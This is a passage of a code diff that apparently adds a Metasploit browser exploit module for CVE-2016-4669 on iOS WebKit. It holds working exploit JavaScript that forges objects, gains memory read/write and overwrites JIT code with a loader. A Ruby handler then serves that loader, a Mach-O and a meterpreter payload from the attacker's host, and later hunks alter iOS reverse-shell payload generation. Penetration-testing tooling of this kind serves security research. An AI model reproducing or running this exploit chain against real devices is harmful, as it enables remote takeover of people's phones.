+        var oob_array = make_oob_array();
+        // Allocate an ArrayStorage after oob_array butterfly.
+        oobStorage[1000] = 2.2;
+
+        // convert into Contiguous storage, so we can materialize
+        // objects
+        oob_array[4] = {};
+
+        // allocate two objects with seven inline properties one after another,
+        // for fake object crafting
+        var oo = [];
+        for (var i=0; i<0x10; i++) {
+          o = {p1:1.1, p2:2.2, p3:1.1, p4:1.1, p5:1.1, p6:1.1, p7:toF64(0x4141, i )};
+          oo.push(o);
+        }
+
+        // for some reason if we just do
+        //var structLeaker = {p1:1.1, p2:2.2, p3:1.1, p4:1.1, p5:1.1, p6:1.1, p7:1.1};
+        //var fakeObjStore = {p1:1.1, p2:2.2, p3:1.1, p4:1.1, p5:1.1, p6:1.1, p7:1.1};
+        // the objects just get some random addressed far apart, and we need
+        // them allocated one after another.
+
+        var fakeObjStore = oo.pop();
+        // we are going to leak Structure pointer for this object
+        var structLeaker = oo.pop();
+
+        // eventually we want to use it for read/write into typed array,
+        // and typed array is 0x18 bytes from our experiments.
+        // To cover all 0x18 bytes, we add four out of line properties
+        // to the structure we want to leak.
+        structLeaker.rw0_f1 = 1.1;
+        structLeaker.rw0_f2 = 1.1;
+        structLeaker.rw0_f3 = 1.1;
+        structLeaker.rw0_f4 = 1.1;
+
+        log("fakeObjStoreAddr: " + addrOf(fakeObjStore).toString(16));
+        log("structLeaker: " + addrOf(structLeaker).toString(16));
+
+        var fakeObjStoreAddr = addrOf(fakeObjStore)
+        // m_typeInfo offset within a Structure class is 0x34
+        // m_typeInfo = {m_type = 0x15, m_flags = 0x80, m_flags2 = 0x0}
+        // for Number
+
+        // we want to achieve the following layout for fakeObjStore
+        //
+        // 0        8       0x10      0x18    0x20    0x28    0x30
+        // |  1.1   |   1.1   | 1.1    |  1.1  |  1.1   |  1.1 |
+        //
+        // 0x30              0x34        0x38     0x40
+        // | fakeObjStoreAddr  | 0x00008015 |  1.1    |
+        //
+        // we materialize fakeObjStoreAddr + 0x30 as an object,
+        // As we can see the Structure pointer points back to fakeObjStore,
+        // which is acting as a structure for our object. In that fake
+        // structure object we craft m_typeInfo as if it was a Number object.
+        // At offset +0x34 the Structure objects have m_typeInfo member indicating
+        // the object type.
+        // For number it is m_typeInfo = {m_type = 0x15, m_flags = 0x80, m_flags2 = 0x0}
+        // So we place that value at offset 0x34 relative to the fakeObjStore start.
+        fakeObjStore.p6 = toF64(fakeObjStoreAddr, 0x008015);
+        var fakeNumber = materialize(fakeObjStoreAddr + 0x30);
+
+        // We call a runtime function valueOf on Number, which only verifies
+        // that m_typeInfo field describes a Number object. Then it reads
+        // and returns 64-bit float value at object address + 0x10.
+        //
+        // In our seven properties object, it's
+        // going to be a 64-bit word located right after last property. Since
+        // we have arranged another seven properties object to be placed right
+        // after fakeObjStore, we are going to get first 8 bytes of
+        // that cell object which has the following layout.
+        // 0     4         8
+        // | m_structure | m_butterfly |
+        var val = Number.prototype.valueOf.call(fakeNumber);
+
+        // get lower 32-bit of a 64-bit float, which is a structure pointer.
+        var _7pStructAddr = toHILO(val)[1];
+        log("struct addr: " + _7pStructAddr.toString(16));
+
+        // now we are going to use the structure to craft an object
+        // with properties allowing as read/write access to Uint32Array.
+
+        var aabb = new ArrayBuffer(0x20);
+
+        // Uint32Array is 0x18 bytes,
+        // + 0xc  m_impl
+        // + 0x10 m_storageLength
+        // + 0x14 m_storage
+        var u32rw = new Uint32Array(aabb, 4);
+
+        // Create a fake object with the structure we leaked before.
+        // So we can r/w to Uint32Array via out of line properties.
+        // The ool properties are placed before the butterfly header,
+        // so we point our fake object butterfly to Uint32Array + 0x28,
+        // to cover first 0x20 bytes via four out of line properties we added earlier
+        var objRW0Store = {p1:toF64(_7pStructAddr,  addrOf(u32rw) + 0x28), p2:1.1};
+
+        // materialize whatever we put in the first inline property as an object
+        var rw0Master = materialize(addrOf(objRW0Store) + 8);
+
+        // magic
+        var o = {p1: 1.1, p2: 1.1, p3: 1.1, p4: 1.1};
+        for (var i=0; i<8; i++) {
+          read32(addrOf(o));
+          write32(addrOf(o)+8, 0);
+        }
+
+        //testRW32();
+        // JSFunction->m_executable
+        var m_executable = read32(addrOf(exec)+0xc);
+
+        // m_executable->m_jitCodeForCall
+        var jitCodeForCall = read32(m_executable + 0x14) - 1;
+        log("jit code pointer: " + jitCodeForCall.toString(16));
+
+        // Get JSCell::destroy pointer, and pass it
+        // to the code we are going to execute as an argument
+        var n = new Number(1.1);
+        var struct = read32(addrOf(n));
+        // read methodTable
+        var classInfo = read32(struct + 0x20);
+        // read JSCell::destroy
+        var JSCell_destroy = read32(classInfo + 0x10);
+
+        log("JSCell_destroy: " + JSCell_destroy.toString(16));
+
+        // overwrite jit code of exec function
+        for (var i=0; i<loader.length; i++) {
+          var x = loader[i];
+          write32(jitCodeForCall+i*4, x);
+        }
+
+        // pass JSCell::destroy pointer and
+        // the macho file as arguments to our
+        // macho file loader, so it can get dylib cache slide
+        var nextBuf = read32(addrOf(macho) + 0x14);
+        // we pass parameters to the loader as a list of 32-bit words
+        // places right before the start
+        write32(jitCodeForCall-4, JSCell_destroy);
+        write32(jitCodeForCall-8, nextBuf);
+        log(nextBuf.toString(16));
+        //logFinalize();
+        // start our macho loader
+        exec(true);
+        alert("no go");
+        logFinalize();
+
+        return;
+      }
+
+      try {
+        function asciiToUint8Array(str) {
+
+          var len = Math.floor((str.length + 4)/4) * 4;
+          var bytes = new Uint8Array(len);
+
+          for (var i=0; i<str.length; i++) {
+            var code = str.charCodeAt(i);
+            bytes[i] = code & 0xff;
+          }
+
+          return bytes;
+        }
+
+        // loads base64 encoded payload from the server and converts
+        // it into a Uint32Array
+        function loadAsUint32Array(path) {
+          var xhttp = new XMLHttpRequest();
+          xhttp.open("GET", path+"?cache=" + new Date().getTime(), false);
+          xhttp.send();
+          var payload = atob(xhttp.response);
+          payload = asciiToUint8Array(payload);
+          return new Uint32Array(payload.buffer);
+        }
+
+        var loader = loadAsUint32Array("loader.b64");
+        var macho = loadAsUint32Array("macho.b64");
+        setTimeout(function() {main(loader, macho);}, 50);
+      } catch (e) {
+        alert(e + "\\n" + e.stack);
+      }
+    JS
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Request #{request.uri} from #{request['User-Agent']}")
+    if request.uri.starts_with? '/loader.b64'
+      loader_data = exploit_data('CVE-2016-4669', 'loader')
+      loader_data = Rex::Text.encode_base64(loader_data)
+      send_response(cli, loader_data, { 'Content-Type' => 'application/octet-stream' })
+      return
+    elsif request.uri.starts_with? '/macho.b64'
+      loader_data = exploit_data('CVE-2016-4669', 'macho')
+      payload_url = "http://#{Rex::Socket.source_address('1.2.3.4')}:#{srvport}/payload"
+      payload_url_index = loader_data.index('PAYLOAD_URL_PLACEHOLDER')
+      loader_data[payload_url_index, payload_url.length] = payload_url
+      loader_data = Rex::Text.encode_base64(loader_data)
+      send_response(cli, loader_data, { 'Content-Type' => 'application/octet-stream' })
+      return
+    elsif request.uri.starts_with? '/payload'
+      print_good('Target is vulnerable, sending payload!')
+      send_response(cli, payload.raw, { 'Content-Type' => 'application/octet-stream' })
+      return
+    end
+
+    html = <<~HTML
+      <html>
+      <body>
+      <script>
+      #{exploit_js}
+      </script>
+      </body>
+      </html>
+    HTML
+
+    send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
+  end
+
+end
diff --git a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb
index db1b846e59..b93d115582 100644
--- a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb
@@ -41,6 +41,6 @@ module MetasploitModule
       scheme: 'http',
       stageless: true
     }
-    MetasploitPayloads::Mettle.new('arm-iphone-darwin', generate_config(opts)).to_binary :exec
+    MetasploitPayloads::Mettle.new('arm-iphone-darwin', generate_config(opts)).to_binary :sha1
   end
 end
diff --git a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb
index 5a0f516b5a..1bf7f4a653 100644
--- a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb
@@ -41,6 +41,6 @@ module MetasploitModule
       scheme: 'https',
       stageless: true
     }
-    MetasploitPayloads::Mettle.new('arm-iphone-darwin', generate_config(opts)).to_binary :exec
+    MetasploitPayloads::Mettle.new('arm-iphone-darwin', generate_config(opts)).to_binary :sha1
   end
 end
diff --git a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb
index bba532a891..c86d239424 100644
--- a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb
@@ -41,6 +41,6 @@ module MetasploitModule
       scheme: 'tcp',
       stageless: true
     }
-    MetasploitPayloads::Mettle.new('arm-iphone-darwin', generate_config(opts)).to_binary :exec
+    MetasploitPayloads::Mettle.new('arm-iphone-darwin', generate_config(opts)).to_binary :sha1
   end
 end